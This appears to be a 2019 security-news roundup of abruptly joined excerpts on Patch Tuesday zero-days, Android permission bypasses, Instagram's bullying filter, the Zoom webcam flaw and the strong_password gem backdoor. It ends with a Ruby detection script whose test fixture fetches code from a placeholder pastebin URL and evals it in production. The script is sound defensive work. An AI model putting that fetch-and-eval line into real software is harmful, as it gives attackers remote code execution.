July 10, 2019

Patch Tuesday this month offers fixes for a total of 77
vulnerabilities, of which 15 are marked critical, rounded out by two zero-day
flaws just to make things interesting.

However, with an
operating system estate as large as Microsoft’s these days, numbers don’t tell
the whole story.

A good example of
this is Microsoft’s Edge and Internet Explorer 11 browsers, which, including
two overlaps, are patched for seven and six flaws respectively, all rated
critical, and all remote code execution (RCE) flaws in the most vulnerable part
of a browser, the web scripting engine.

It’s worth
drawing attention to this because it’s easy to overlook the security of
software bundled in Windows 10 which some users either use infrequently, or do
not use at all.

As explained in
previous coverage, this is particularly the case with IE 11, which many
Windows 10 users don’t even realise is there but hangs around to maintain
backwards compatibility. Compare that to Windows 10 64-bit version 1903, which
earns only one critical, CVE-2019-1102.

Zero days

The two zero days
are CVE-2019-0880
and CVE-2019-1132,
both Elevation of Privilege (EoP) flaws currently being exploited in the wild
by unnamed threat groups. The first affects the Windows splwow64 print spooler
while the second is in Win32k.

Android apps must
ask for permission to access sensitive resources on the phone, like the GPS,
the camera, or the user’s contacts data. When you say that an app can’t access
your location data, the operating system can prevent it from doing so because
it runs the app in its own sandbox. That also stops the app in question
interacting with other apps.

Sidestepping permissions

The researchers
analysed over 88,000 Android apps to see what data they transmitted from the
phone, and where they sent it. They ran the test on a variety of Android
systems, with the most recent being Android Pie (2018). They matched this
against the permissions that the user had granted the app to see if apps were
harvesting data that they shouldn’t be. They found dozens of apps transmitting
data they shouldn’t have accessed, along with thousands more containing the
code to do so. They reverse engineered the code and found two main methods for
circumventing permissions protections.

Instagram on
Monday announced
that it’s now using artificial intelligence (AI) to detect speech that looks
like bullying and that it will interrupt users before they post, asking if they
might want to stop and think about it first.

The
Facebook-owned platform, hugely popular with teens, also plans to soon test a
new feature called “Restrict” that will enable users to hide comments from
specific users without letting them know that they’ve been muted.

In a blog post, Instagram chief executive Adam Mosseri said the company “could do more” to stop bullying and help out its victims:

We can do more to
prevent bullying from happening on Instagram, and we can do more to empower the
targets of bullying to stand up for themselves.

These tools are
grounded in a deep understanding of how people bully each other and how they
respond to bullying on Instagram, but they’re only two steps on a longer path.

Think before you post

Instagram posted
one example of what would-be bullies are going to see if its AI interprets
their comments as offensive: a user who types “you are so ugly and stupid” gets
interrupted with a notice saying: “Are you sure you want to post this? Learn
more”.

If the user taps
“learn more”, they get this notice: “We are asking people to rethink comments
that seem similar to others that have been reported.”

Zoom, a company that sells video conferencing
software for the business market, is tweaking the app to fix a vulnerability in
its software that allows malicious websites to force users into a Zoom call
with the webcam turned on.

The flaw was
discovered by security researcher Jonathan Leitschuh, who documented it in a
blog post on Monday.

He said that
initially, the vulnerability would have also allowed any webpage to inflict a
denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an
invalid call. But that DoS vulnerability – CVE-2019-13449
– was fixed in version 4.4.2 of the macOS client.

In discussions
with the Zoom team over the past few weeks, Leitschuh said that Zoom had
proposed a fix to the hijacking vulnerability: namely, digitally signing
requests from websites that are made to the client.

But the
researcher said that wouldn’t have solved the problem, given that an attacker
would be able to set up a server to make requests to the Zoom site in order to
acquire a valid digital signature before contacting the client.

Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]

An eagle-eyed
developer has discovered
a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails
(RoR) web apps to check password strength.

A close shave,
then. While the Ruby scripting language and RoR aren’t as popular as they once
were, they’re still embedded in numerous enterprise development environments,
many of which might have used the default library, strong_password, in its
infected version 0.0.7.

The discovery came about after Epion Health developer Tute Costa noticed something unusual when carefully updating a family of libraries used by his company’s developers to fix bugs and security vulnerabilities.

When he looked at
the strong_password gem on RubyGems.org, he couldn’t locate a changelog
explaining how it got to the updated version from 0.0.6, an event which
happened on 25 June 2019.

The previous
GitHub version had been updated in October 2018. Comparing the two versions, he
noticed the mystery 0.0.7 version embedded a download link which:

Fetches and
runs the code stored in a pastebin.com, only if running in production, with an
empty exception handling that ignores any error it may raise.

The backdoor would download code from the Pastebin address on production sites, giving the attackers remote code execution and silently hijacking any website unfortunate enough to have updated to the rogue strong_password gem.
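As an added example (not code from the article, from Tute Costa, or from the strong_password project), the following Ruby script turns the pattern described above into a triage heuristic: it flags gem source that combines a remote fetch with `eval`, and raises confidence when that code is gated on production and wrapped in an error-swallowing `rescue`. The fixtures are constructed, and the pastebin.example URL is a placeholder.

```ruby
require "rubygems"

# Each signal is a list of regexes; a file triggers the signal if any matches.
SIGNALS = {
  remote_fetch:    [/Net::HTTP/, /open-uri/, /URI\.open/, %r{https?://[^"']+}, /pastebin\.com/],
  dynamic_eval:    [/\beval\(/, /\b(?:instance|class|module)_eval\b/],
  production_gate: [/Rails\.env\.production\?/, /RAILS_ENV["']\]\s*==\s*["']production/],
  empty_rescue:    [/\brescue\b[^\n]*\n\s*end\b/], # rescue line followed directly by end
}.freeze

# Score one Ruby source string. Fetch + eval together is the core signal (3);
# a production-only gate and an error-swallowing rescue each add 1.
def scan_source(src)
  hits = SIGNALS.select { |_, res| res.any? { |re| src.match?(re) } }.keys
  score = 0
  score += 3 if hits.include?(:remote_fetch) && hits.include?(:dynamic_eval)
  score += 1 if hits.include?(:production_gate)
  score += 1 if hits.include?(:empty_rescue)
  { hits: hits, score: score, suspicious: score >= 3 }
end

# Scan every .rb file of an installed gem (optionally a specific version) and
# return [path, result] pairs for the files that scored as suspicious.
def scan_installed_gem(name, version = nil)
  spec = version ? Gem::Specification.find_by_name(name, version) : Gem::Specification.find_by_name(name)
  Dir.glob(File.join(spec.full_gem_path, "**", "*.rb")).filter_map do |path|
    result = scan_source(File.read(path))
    [path, result] if result[:suspicious]
  end
end

# Constructed fixtures (not the real gem code): a benign validator and a file
# mimicking the fetch-eval-in-production pattern the article describes.
BENIGN = <<~SRC
  class StrengthCheck
    def weak?(password)
      password.length < 10
    end
  end
SRC

SUSPICIOUS = <<~SRC
  if Rails.env.production?
    begin
      eval(Net::HTTP.get(URI("https://pastebin.example/raw/PLACEHOLDER")))
    rescue
    end
  end
SRC

if __FILE__ == $0
  p scan_source(BENIGN)      # score 0, not suspicious
  p scan_source(SUSPICIOUS)  # score 5, suspicious
end
```

This is a triage heuristic, not a verdict: a file with a URL in a comment and an unrelated `eval` will also score, so flagged files still need a manual diff against the upstream repository tag, which is the check that exposed strong_password 0.0.7.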
